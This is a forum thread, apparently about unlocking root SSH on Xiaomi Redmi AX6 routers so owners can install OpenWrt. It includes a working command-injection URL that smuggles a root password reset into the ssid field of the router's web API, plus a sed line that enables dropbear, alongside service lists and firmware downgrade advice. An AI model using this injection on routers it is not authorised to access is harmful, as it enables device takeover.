the code you got might right.i dont know what's wrong,maybe your firmware was updated and fix this backdoor.try to use older firmware.
the firmware,be careful,i dont know how to
oldfirmware:https://drivers.mydrivers.com/drivers/512_204940.htm
official firemware:http://www.miwifi.com/miwifi_download.html
when you do something wrong,do this
https://www.xiaomi.cn/post/19156828
Thank u, I opened the SSH now but I don't know the password.
use this url change pwd to 'admin'
http://192.168.31.1/cgi-bin/luci/;stok=/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20echo%20-e%20'admin%5Cnadmin'%20%7C%20passwd%20root%3B
or
sed -i '/flg_ssh.*release/{n;s/return/true/}' /etc/init.d/dropbear
more info
https://www.right.com.cn/forum/thread-4032490-1-1.html
It seems that doesn't work for me. I have tried lots of password.
a. redmi wifi password
b. openwrt router login password
b. Openwrt router wifi password
username: root
AX6 ssh and shellclash
look my blog
i dont have too much time to translate properly,it is 0:00 2021/6/10 now.
pls use google translate.
@robust A bit off-topic, but have you looked at the AX9000 FW for vulnerabilities to get the UART TX working?
Mine finally arrived today so that we can get IPQ8072/4/6/8A support but gotta find a way to enable UART of SSH first.
sorry i don't konw a lot about it, i can't give you an good answer.
i searched ,and i did't find any solution about unlocking ax9000.
you konw ,ax9000 is expensive, less people buy it here,and XiaoMI does't follow GPL-2.0 license.so developer may don't have too much passion to hack it.
As i konw ,about IPQ8072/4/6 Some QSDK openwrt code has released for ax6 ax5.Moreover Pandora Box and uboot is in development.
Ok, understood.
I dont really care about the various QSDK crappy releases and other so called "OpenWrt" based releases.
yeah,but wifi driver is still a big problem for op 
Why is it a problem?
i dont know a lot about it
some people test and say wifi performance QSDK is better.
i don't test it, i am not sure
Maybe Qualcomm has made some magical optimizations for QSDK.
I'm busy recently, I haven't been focusing on the community for two months.
Its better as everything is offloaded, we have some offloading as well.
If you want to run QSDK why not run the vendor FW then?
By you are mean all of the people that complain about bricking their device with a random QSDK build.
Thanks for the SSH guide, very nice to have this until an official openwrt version is released.
After I managed to get SSH in the stock firmware.
acd
auto_speedtest
boot
boot_check
cab_meshd
cgroup_init
cnss_diag
cp_preinstall_plugins.sh
cron
cron_fixup
datacenter
ddns
dhcrelay4
diag_socket_app
dnsmasq
done
dropbear
firewall
ftm
gpio_switch
hyd
hyfi-bridging
inetd
ipv6
iweventd
key_services_boot_check
lbd
memtestctl
meshd
messagingagent.sh
miniupnpd
miqos
miwifi-roam
mobile_accel
mosquitto
netapi
network
nginx
odhcpd
openvpn
plugin_start_script.sh
plugincenter
powerctl
pppoe-relay
pppoe-server
qca-hostapd
qca-iot
qca-nss-drv
qca-nss-ecm
qca-ssdk
qca-wpa-supplicant
qcmbr
repacd
rngd
rpcd
shortcut-fe
sigma-dut
skb_recycler
smartcontroller
smartvpn
ssid_steering
stat_points
statisticsservice
sysctl
sysfixtime
syslog-ng
sysntpd
sysstat
system
tbusd
telnet
timezone
topomon
trafficd
uhttpd
umount
urandom_seed
wan_check
wifi_fw_mount
xiaoqiang_sync
xl2tpd
xq_info_sync_mqtt
xqbc
xqled
/etc/init.d/service_name stop
or
/etc/init.d/service_name disable
Thanks
#!/bin/sh
/etc/init.d/cron stop
/etc/init.d/statisticsservice stop
/etc/init.d/datacenter stop
/etc/init.d/plugincenter stop
/etc/init.d/cab_meshd stop
/etc/init.d/iweventd stop
/etc/init.d/meshd stop
/etc/init.d/messagingagent.sh stop
# /etc/init.d/miniupnpd stop # needed for DNLA
/etc/init.d/netapi stop
# /etc/init.d/nginx stop # needed for WEB UI
/etc/init.d/rpcd stop
/etc/init.d/smartcontroller stop
/etc/init.d/stat_points stop
/etc/init.d/syslog-ng stop
/etc/init.d/trafficd stop
#kill `pidof fcgi-cgi` # needed for WEB UI
kill `pidof stat_points.cron`
kill `pidof stat_points.helper`
kill `pidof tail`
kill `pidof syslog-ng.helper`
killall sleep
#kill `pidof ubusd` # consider if needed for IPC
#kill `pidof tbusd` # consider if needed for IPC
This is what I use currently (killing/stopping process I don't need).
It is possible to disable the services instead of killing (but I wasn't brave enough)
Other question, any body knows why load average is always 1, even when the router doesn't do a thing?
root@XiaoQiang:~# uptime
19:42:12 up 9 min, load average: 1.08, 0.89, 0.49
root@XiaoQiang:~#
Interestingly, now, after some time, I do not have access to SSH on AX6 anymore. I tried to repeat the procedure which worked last time, but it does not work now. (fortunately, the changes I made last time staid)
Points 4. and 5. don't work for me anymore.
Point 4. returns this:
No page is registered at '/api/misystem/extendwifi_connect'.
If this url belongs to an extension, make sure it is properly installed.
If the extension was recently installed, try removing the /tmp/luci-indexcache file.
Point 5. (logically) returns this:
{"msg":"一键换机过程中发生未知的内部错误","code":1639}
translated as
{"msg":"An unknown internal error occurred during the one-key exchange","code":1639}
The current firmware is 1.1.10. I don't know if it has been updated since the last time. I will try it in Safari (Mac OS) - now I am on Firefox (Windows), so I don't know if there might be some problem...
Hello, Do you have any news about this URL trouble? I have the same, bet it's due to an update of the firmware, a downgrade is needed I guess...
which version are you using? does this still work with version > 3.* ?
Yes, I bet it is the newer firmware. Pretty much everyone suggests to downgrade to 1.0.16 or 1.0.18:
https://forum.openwrt.org/t/tuto-openwrt-unofficial-redmi-ax6/111340#downgrade-the-official-firmware-4
It should be quite easy and straightforward.
I am going to switch from the stock firmware to OpenWRT tonight or during the weekend, but I still have a few questions.
I got a new Redmi AX3000
From the instructions I see that it is necessary to downgrade to FW 1.0.17.
The router, however, does not let me do the downgrade, it fails file verification.
Is there anything that can be done ?
Thanks